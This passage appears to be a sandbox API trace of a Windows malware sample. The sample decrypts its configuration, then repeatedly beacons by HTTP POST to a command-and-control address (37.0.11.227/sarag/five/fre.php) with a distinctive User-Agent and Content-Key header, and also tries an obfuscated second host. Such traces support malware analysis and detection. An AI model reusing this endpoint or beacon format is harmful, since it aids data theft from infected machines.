hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0193.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.618] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0193.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.620] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0193.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.621] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0193.621] GetProcessHeap () returned 0x690000 [0193.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0193.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.624] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0193.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.625] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0193.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.626] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0193.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.628] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0193.628] GetProcessHeap () returned 0x690000 [0193.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0193.628] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b27e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0193.628] GetProcessHeap () returned 0x690000 [0193.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0193.628] socket (af=2, type=1, protocol=6) returned 0x3b4 [0193.629] connect (s=0x3b4, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0193.659] FreeAddrInfoW (pAddrInfo=0x6b27e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0193.659] GetProcessHeap () returned 0x690000 [0193.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0193.659] GetProcessHeap () returned 0x690000 [0193.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0193.660] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0193.661] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.661] GetProcessHeap () returned 0x690000 [0193.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0193.661] GetProcessHeap () returned 0x690000 [0193.662] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0193.662] GetProcessHeap () returned 0x690000 [0193.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0193.663] GetProcessHeap () returned 0x690000 [0193.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0193.663] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0193.664] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.664] GetProcessHeap () returned 0x690000 [0193.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0193.664] GetProcessHeap () returned 0x690000 [0193.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0193.665] send (s=0x3b4, buf=0x6abd08*, len=242, flags=0) returned 242 [0193.665] send (s=0x3b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0193.665] GetProcessHeap () returned 0x690000 [0193.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0193.665] recv (in: s=0x3b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0193.754] GetProcessHeap () returned 0x690000 [0193.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0193.754] GetProcessHeap () returned 0x690000 [0193.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0193.757] GetProcessHeap () returned 0x690000 [0193.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0193.758] GetProcessHeap () returned 0x690000 [0193.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0193.758] closesocket (s=0x3b4) returned 0 [0193.759] GetProcessHeap () returned 0x690000 [0193.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0193.759] GetProcessHeap () returned 0x690000 [0193.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0193.760] GetProcessHeap () returned 0x690000 [0193.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0193.760] GetProcessHeap () returned 0x690000 [0193.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0193.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1130) returned 0x3b4 [0193.763] Sleep (dwMilliseconds=0xea60) [0193.765] GetProcessHeap () returned 0x690000 [0193.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0193.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.801] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0193.807] GetProcessHeap () returned 0x690000 [0193.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0193.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.809] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0193.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.810] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.811] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.811] GetProcessHeap () returned 0x690000 [0193.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0193.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.813] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0193.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.814] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0193.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.814] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0193.814] GetProcessHeap () returned 0x690000 [0193.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0193.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.815] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.816] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.823] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.824] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.824] GetProcessHeap () returned 0x690000 [0193.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0193.824] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.824] GetProcessHeap () returned 0x690000 [0193.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0193.825] GetProcessHeap () returned 0x690000 [0193.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0193.825] GetProcessHeap () returned 0x690000 [0193.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0193.826] GetProcessHeap () returned 0x690000 [0193.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0193.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.839] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0193.848] GetProcessHeap () returned 0x690000 [0193.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0193.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.850] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0193.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.851] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.852] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.852] GetProcessHeap () returned 0x690000 [0193.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0193.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.856] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0193.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.857] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0193.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.859] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0193.859] GetProcessHeap () returned 0x690000 [0193.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0193.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.860] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0193.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.862] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0193.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.863] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0193.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.864] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0193.866] GetProcessHeap () returned 0x690000 [0193.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0193.866] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2830*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0193.866] GetProcessHeap () returned 0x690000 [0193.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0193.866] socket (af=2, type=1, protocol=6) returned 0x3b8 [0193.867] connect (s=0x3b8, name=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0193.893] FreeAddrInfoW (pAddrInfo=0x6b2830*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0193.893] GetProcessHeap () returned 0x690000 [0193.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0193.894] GetProcessHeap () returned 0x690000 [0193.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0193.894] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0193.896] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.896] GetProcessHeap () returned 0x690000 [0193.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0193.896] GetProcessHeap () returned 0x690000 [0193.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0193.896] GetProcessHeap () returned 0x690000 [0193.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0193.896] GetProcessHeap () returned 0x690000 [0193.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0193.900] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0193.900] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.901] GetProcessHeap () returned 0x690000 [0193.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0193.901] GetProcessHeap () returned 0x690000 [0193.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0193.901] send (s=0x3b8, buf=0x6abd08*, len=242, flags=0) returned 242 [0193.902] send (s=0x3b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0193.902] GetProcessHeap () returned 0x690000 [0193.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0193.902] recv (in: s=0x3b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0194.000] GetProcessHeap () returned 0x690000 [0194.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.001] GetProcessHeap () returned 0x690000 [0194.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0194.001] GetProcessHeap () returned 0x690000 [0194.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0194.001] GetProcessHeap () returned 0x690000 [0194.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0194.002] closesocket (s=0x3b8) returned 0 [0194.002] GetProcessHeap () returned 0x690000 [0194.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0194.003] GetProcessHeap () returned 0x690000 [0194.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0194.003] GetProcessHeap () returned 0x690000 [0194.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.003] GetProcessHeap () returned 0x690000 [0194.004] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1134) returned 0x3b8 [0194.011] Sleep (dwMilliseconds=0xea60) [0194.012] GetProcessHeap () returned 0x690000 [0194.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0194.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.021] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0194.028] GetProcessHeap () returned 0x690000 [0194.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0194.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.029] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.030] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.034] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.034] GetProcessHeap () returned 0x690000 [0194.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0194.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.035] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0194.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.036] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.049] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0194.050] GetProcessHeap () returned 0x690000 [0194.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0194.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.052] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.053] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.056] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.057] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.057] GetProcessHeap () returned 0x690000 [0194.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0194.057] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.057] GetProcessHeap () returned 0x690000 [0194.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.058] GetProcessHeap () returned 0x690000 [0194.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0194.058] GetProcessHeap () returned 0x690000 [0194.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.058] GetProcessHeap () returned 0x690000 [0194.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0194.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0194.070] GetProcessHeap () returned 0x690000 [0194.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0194.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.071] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.072] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.073] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.073] GetProcessHeap () returned 0x690000 [0194.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0194.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.074] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0194.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.077] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.078] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0194.078] GetProcessHeap () returned 0x690000 [0194.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0194.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.078] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0194.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.079] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0194.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.080] StrStrA 